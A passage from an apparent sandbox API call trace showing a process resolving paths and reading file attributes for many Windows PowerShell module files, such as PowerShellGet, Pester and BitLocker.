(normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.security\\microsoft.powershell.security.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x296)) returned 1 [0154.204] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", lpFilePart=0x0) returned 0x7c [0154.204] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.205] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautilshelper.ps1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c)) returned 1 [0154.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", lpFilePart=0x0) returned 0x77 [0154.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.205] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47a8)) returned 1 [0154.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0154.205] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.205] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x6194)) returned 1 [0154.205] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0154.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.206] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3ae304, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3ae304, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3ae304, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x955)) returned 1 [0154.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1", lpFilePart=0x0) returned 0x6b [0154.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.206] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Host\\Microsoft.PowerShell.Host.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.host\\microsoft.powershell.host.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1a4)) returned 1 [0154.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1", lpFilePart=0x0) returned 0x79 [0154.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.206] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Diagnostics\\Microsoft.PowerShell.Diagnostics.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.diagnostics\\microsoft.powershell.diagnostics.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3880a1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3880a1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3880a1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x256)) returned 1 [0154.206] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1", lpFilePart=0x0) returned 0x71 [0154.206] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.206] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Archive\\Microsoft.PowerShell.Archive.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.archive\\microsoft.powershell.archive.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3d455a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3d455a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3d455a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x17c)) returned 1 [0154.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", lpFilePart=0x0) returned 0x5b [0154.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.207] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14f2ae4a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x14f2ae4a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x14f2ae4a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x368)) returned 1 [0154.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", lpFilePart=0x0) returned 0x4b [0154.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.207] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420)) returned 1 [0154.207] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1", lpFilePart=0x0) returned 0x41 [0154.207] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.207] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352)) returned 1 [0154.208] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.208] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1", lpFilePart=0x0) returned 0x49 [0154.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.208] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadLine.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\1.1\\psreadline.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97199283, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xb4)) returned 1 [0154.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.209] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0154.209] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.209] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0154.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.210] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psm1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psm1", lpFilePart=0x0) returned 0x43 [0154.210] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.210] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de)) returned 1 [0154.210] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.211] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0154.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.211] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0154.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.211] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1", lpFilePart=0x0) returned 0x4e [0154.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.211] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PSModule.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\psmodule.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3)) returned 1 [0154.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.212] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0154.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.212] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4)) returned 1 [0154.212] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.212] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\.\\AssignedAccess.psm1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psm1", lpFilePart=0x0) returned 0x55 [0154.212] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.212] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x692d2629, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x692f8869, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x1d69)) returned 1 [0154.213] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.213] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1", lpFilePart=0x0) returned 0x55 [0154.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.214] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess\\AssignedAccess.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\assignedaccess.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x37eb452f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x37eb452f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x198)) returned 1 [0154.214] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.214] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psm1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psm1", lpFilePart=0x0) returned 0x4b [0154.214] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.214] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psm1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48564)) returned 1 [0154.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1", lpFilePart=0x0) returned 0x4b [0154.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker\\BitLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker\\bitlocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3537dbc4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3537dbc4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3537dbc4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x644)) returned 1 [0154.215] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508e300) returned 1 [0154.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", nBufferLength=0x105, lpBuffer=0xafa508def0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1", lpFilePart=0x0) returned 0x51 [0154.215] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508e340) returned 1 [0154.215] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer\\BitsTransfer.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer\\bitstransfer.psd1"), fInfoLevelId=0x0, lpFileInformation=0xafa508e420 | out: lpFileInformation=0xafa508e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f27d034, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f27d034, 